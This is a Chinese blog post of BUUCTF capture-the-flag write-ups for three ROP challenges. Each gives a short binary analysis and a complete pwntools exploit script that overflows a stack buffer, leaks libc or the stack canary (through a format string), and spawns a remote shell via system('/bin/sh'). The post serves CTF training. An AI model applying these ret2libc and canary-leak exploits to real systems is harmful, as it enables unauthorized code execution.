buuctf ---- ROP集合(未完)

最新推荐文章于 2023-03-05 15:16:40 发布
最新推荐文章于 2023-03-05 15:16:40 发布
阅读量2.6k 收藏 1
点赞数
分类专栏: pwn 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ckk1314520/article/details/122710566
版权

buuctf ---------- babyrop1

在这里插入图片描述
NX栈不可执行开启

使用32位IDA查看程序

在这里插入图片描述
读取输入,进行字符串比较,不同则退出,相同则返回输入的第8个字节,可以通过输入 \0 绕过字符串比较

在这里插入图片描述
a1可以是255,造成buf溢出。

在这里插入图片描述
编写exp

from pwn import *
from LibcSearcher import *
io=remote("node4.buuoj.cn",28966)
elf=ELF("pwn")

write_plt=elf.plt['write']
puts_got=elf.got['puts']
start=0x080485A0
main=0x08048825

payload="\x00"+"\xff"*(0x2c-0x25)
io.sendline(payload)
io.recvuntil("Correct\n")
payload2='a'*0xE7+'a'*4+p32(write_plt)+p32(start)+p32(1)+p32(puts_got)+p32(4)
io.send(payload2)
puts_got=u32(io.recv(4))


libc=LibcSearcher('puts',puts_got)
base=puts_got-libc.dump('puts')
system=base+libc.dump('system')
binsh=base+libc.dump('str_bin_sh')

payload="\x00"+"\xff"*(0x2c-0x25)


io.sendline(payload)
io.recvuntil("Correct\n")
payload2='a'*0xE7+'a'*4+p32(system)+p32(0)+p32(binsh)
io.sendline(payload2)
io.interactive()

在这里插入图片描述

buuctf ---------- babyrop2

在这里插入图片描述
使用64位的IDA查看

在这里插入图片描述
思路:buf只有0x20,却要读入0x100,会发生溢出。构造system(‘/bin/sh’),利用read函数,去泄露程序的libc基址,然后去获得system和/bin/sh字符串的地址。

编写exp

from pwn import *
from LibcSearcher import *
context.log_level = 'debug'

io=remote('node4.buuoj.cn',29857)
elf = ELF('babyrop2')

pop_rdi = 0x0000000000400733
pop_rsi_r15 = 0x0000000000400731
format_str = 0x0000000000400770
ret_addr = 0x0000000000400734

printf_plt = elf.plt['printf']
read_got = elf.got['read']
main_plt = elf.sym['main']

payload = 'a'*0x28+p64(pop_rdi)+p64(format_str)+p64(pop_rsi_r15)+p64(read_got)+p64(0)+p64(printf_plt)+p64(main_plt)

io.recvuntil("name? ")
io.sendline(payload)

read_addr = u64(io.recvuntil('\x7f')[-6:].ljust(8, '\x00'))
print hex(read_addr)

#利用libcsearcher库去查找匹配的libc版本
libc = LibcSearcher('read', read_addr)
#计算程序里的偏移量
libc_base = read_addr - libc.dump('read')

#计算程序里system和/bin/sh的地址
sys_addr = libc_base + libc.dump('system')
bin_sh = libc_base + libc.dump('str_bin_sh')

payload = 'a'*0x28+p64(pop_rdi)+p64(bin_sh)+p64(sys_addr)
io.sendline(payload)
io.interactive()

在这里插入图片描述

buuctf ---------- bjdctf_2020_babyrop2

在这里插入图片描述

存在canary保护。

使用64位IDA查看main函数

在这里插入图片描述
init函数调用put函数输出提示

在这里插入图片描述
gift函数有printf函数,可以通过格式化字符串漏洞泄漏canary的值。

在这里插入图片描述
而vuln函数存在栈溢出漏洞,通过栈溢出漏洞进行程序劫持

在这里插入图片描述
编写exp

from pwn import *
from LibcSearcher import *
context.log_level='debug'

io=remote('node4.buuoj.cn',26126)

elf=ELF('./bjdctf_2020_babyrop2')
pop_rdi=0x00400993
puts_got=elf.got['puts']
puts_plt=elf.plt['puts']
vuln_addr=elf.symbols['vuln']

io.recvuntil("I'll give u some gift to help u!")
io.sendline('%7$p')
io.recvuntil('0x')
canary=int(io.recv(16),16)
print('[+]canary: ',hex(canary))

payload='a'*(0x20-0x8)+p64(canary)+'b'*0x8
payload+=p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(vuln_addr)
io.recvuntil('Pull up your sword and tell me u story!')
io.sendline(payload)
io.recv()

puts_addr=u64(io.recv(6).ljust(8,'\x00'))
libc=LibcSearcher('puts',puts_addr)
libc_base=puts_addr-libc.dump('puts')
system_addr=libc_base+libc.dump('system')
bin_addr=libc_base+libc.dump('str_bin_sh')

io.recvuntil('Pull up your sword and tell me u story!')
payload='a'*(0x20-0x8)+p64(canary)+'b'*0x8
payload+=p64(pop_rdi)+p64(bin_addr)+p64(system_addr)
io.sendline(payload)

io.interactive()

在这里插入图片描述

@See you later
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF - PWN】babyrop
古月浪子的博客
03-25 1743
checksec一下,可以栈溢出 IDA打开看看,读取随机数作为参数传入函数中 读取输入,进行字符串比较,不同则退出,相同则返回输入的第8个字节,可以通过输入 \0 绕过字符串比较 返回的字节作为read的长度,buf只有231字节,可以通过传入255来栈溢出,然后就是标准的ret2libc了 from pwn import * from LibcSearcher import * co...
BUUCTF|PWN-[OGeek2019]babyrop1-WP
l2645470582_的博客
01-12 2255
1.检查保护机制 (1)该文件是32位文件 (2)开启堆栈不可执行 2.用32位IDA打开该文件
buuctf pwn rip 1,rop解法
amber_o0k的博客
11-07 1153
from pwn import * io = remote('node4.buuoj.cn', 27175) pop_rdi_ret=0x4011fb bin_sh=0x40201b syscall=0x401040 ret=0x401016 payload=b'a'*(0xf+8)+p64(ret)+p64(pop_rdi_ret)+p64(bin_sh)+p64(syscall) io.sendline(payload) io.interactive() 这个解法有点复杂了,强行构造了一波rop。.
buuoj [第六章 CTF之PWN章]ROP
yongbaoii的博客
01-28 984
ret2libc 保护。 啥没有。 直接就溢出了,但是没后门函数,就通过puts函数泄露puts函数地址,计算libc基地址,找到system函数与’/bin/sh’, 然后一把梭就好。 需要用到gadget。 exp
BUUCTF--[OGeek2019]babyrop
N1rvana的博客
11-14 3646
才学习了基本的ROP流程,到处找题练,不过也没做出来几道题,以这道32位的题作为例题吧。 这道题是BUUCTF上pwn练习题里的[OGeek2019]babyrop。 代码审计 老规矩先checksec一下: 没有canary保护,nx保护开启排除shellcode可能性,FULL RELEO为地址随机化。 观察主函数,先设定了一个闹铃,到时间就会强制退出程序,解除闹铃的方法在上一篇博客中提到过了, 这道题中闹铃函数依然对我们解题起不到什么干扰作用。 主函数的思路大概是:生成一个随机数,把这个随机数作为
关于buuctf[OGeek2019]babyrop 1的一些些小结
Probeginner的博客
11-25 661
首先对于题目分析: 正常的32位小端序,checksec一下发现开了NX…………算了直接进正题。1.open函数的返回值,如果执行成功,他将返回一个文件描述,如果失败,他将返回-1.这里显然是成功了 2.文件描述符:0,1,2:是标准I/O输入、输出、错误。这里open执行成功了会返回3。 3.此时read(fd,&buf,4u)的意思是把fd指向的那个随机数输入buf中。 这里需要注意的是:strcmp函数可用“\x00”来截断,进而覆盖下面的v5变量,随后让 第二个read函数读入的“a1”
0001-TIPS-2020-hxp-kernel-rop : ret2user
06-19
0001-TIPS-2020-hxp-kernel-rop : ret2user
adobe-rop-webapp
05-25
school_adobe 更改照片: #### main.js在main.js ,需要更改两个数组: att_arr和IMAGES 。 att_arr保留为每张照片显示的字幕-摄影师的名字后应带有© 如果可以的话,接下来可以是一年。 例如: "Photographer...
rop-master.rar
11-04
RopRop 是 Rapid Open PlatformRapid Open Platform Rapid Open Platform Rapid Open PlatformRapid Open Platform Rapid Open PlatformRapid Open PlatformRapid Open Platform Rapid Open PlatformRapid Open ...
Rop-Fast:快速跳动
06-25
**Rop-Fast:快速构建RESTful服务的框架** Rop-Fast是一个专门设计用于快速构建REST风格服务的框架,其根源在于Rop( Responsibility-Oriented Programming)框架。Rop框架强调职责导向编程,旨在提高代码的可读性...
project-rop
03-16
关于Laravel Laravel是一个具有表达力,优雅语法的Web应用程序框架。 我们认为,发展必须是一种令人愉快的,富有创造力的经历,才能真正实现。 Laravel减轻了许多Web项目中使用的常见任务,从而减轻了开发过程中的...
BUUCTF-PWN-inndy_rop
Rt1Text的博客
03-05 338
可以栈溢出,没有system函数,使用系统调用利用ROPgadget的功能直接利用程序中的片段拼凑rop链。
writeUP-[OGeek2019]babyrop 1
weixin_52111404的博客
08-12 548
本题之前做过类似题型,在此主要记录使用LibcSearcher时遇到的问题。
buuctf刷题——[OGeek2019]babyrop 1
qq_41560595的博客
03-14 3502
好久好久没做ctf题了,今天得空刷刷buuctf,emm,发现好多都忘了。???????????? 查看权限 不能利用shellcode,但可以构造栈溢出。 查看源程序 为了方便区分,重命名了下函数。 open函数的返回值:如果操作成功,它将返回一个文件描述符,如果操作失败,它将返回-1; 文件描述符:0,1,2是标准IO输入/输出/错误输出给占用了,当文件open成功了,会返回数值3; read(fd,&buf,4u)是把fd所指向的随机数写入到buf文件中,长度是4个字节。 此时,buf是
BUUCTF-bjdctf_2020_babyrop1-WP
Rt1Text的博客
10-17 235
只有NX保护。
BUUCTF ciscn_2019_c_1(rop_x64,泄露libc)
菜的只能随便写写博客
11-26 5853
由于Ubuntu18的环境很迷,这个题目只在kali上用本地libc成过,脚本也是kali环境的 0x1 检查文件 64位elf 无canary 无PIE   0x02 流程分析 根据运行的流程,这个程序主要有两个功能,加密功能可以使用,但解密功能没办法使用,并且能够输入的地方就两个,一个选择程序,数字输入,第二个输入加密文本,字符串类型,之后的静态分析主要关注这两个地方。   0x02...
[BUUCTF]inndy_rop 杂谈、32位与64位系统调用、与思考
Tokameine的博客
09-07 534
总之先从题目开始看吧,是一道非常简单但却让我长见识的题...... int overflow() { char v1[12]; // [esp+Ch] [ebp-Ch] BYREF return gets(v1); } 明显的栈溢出,且程序基本没有特别的保护,正常构造rop链即可拿到shell 主要是想拓展一下系统调用与一个简单的获取ROP方法 ROPgadget --binary rop --ropchain ROP chain...
2021 rois暑假集训——栈溢出与简单的rop链(buuctf练习)
weixin_56780239的博客
08-07 1209
2021年暑假参加集训,在buuctf上做的几道题的writeup.
BUUCTF [OGeek2019]babyrop
红叶的博客
10-30 655
不知道为什么远程进不去,后来选择了不用LibcSearcher,用题目提供的Libc进去了。分析反汇编成C语言的程序源码后,就是常规的ret2libc了。由于本题是32位ELF,因此不需要rdi与ret栈对齐。思路有了,接下来是构造PoC与Payload。strlen 遇到 \x00会截断。使用puts函数进行泄露真实地址。成功本地获取shell。首先绕过 strlen。
2013-plaidctf-ropasaurusrex
最新发布
08-07
2013年的PlaidCTF比赛中有一道题目叫做"ropasaurusrex",是一个涉及了ROP(Return Oriented Programming)技术的题目。 ROP是一种通过利用程序中已存在的代码片段(称为gadgets)来进行攻击的技术。在这道题目中,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值